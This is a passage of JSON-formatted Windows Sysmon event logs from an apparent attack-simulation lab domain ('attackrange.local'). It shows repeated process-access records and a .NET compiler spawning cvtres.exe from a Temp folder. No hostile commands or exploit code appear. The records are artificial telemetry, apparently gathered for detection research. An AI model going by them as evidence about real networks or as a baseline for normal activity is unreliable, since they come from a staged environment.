C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5518,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5519,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5520,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5521,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5522,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5523,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5524,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.703\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-00108C970A00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.703","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-00108C970A00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5525,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.777\r\nProcessGuid: {A837DB8D-032F-5F25-0000-0010149B0A00}\r\nProcessId: 4688\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESE16E.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\CSCF5F14E36D8D04D21ABC5905061C378F8.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-032F-5F25-0000-00108C970A00}\r\nParentProcessId: 2856\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\x31htb3z\\x31htb3z.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 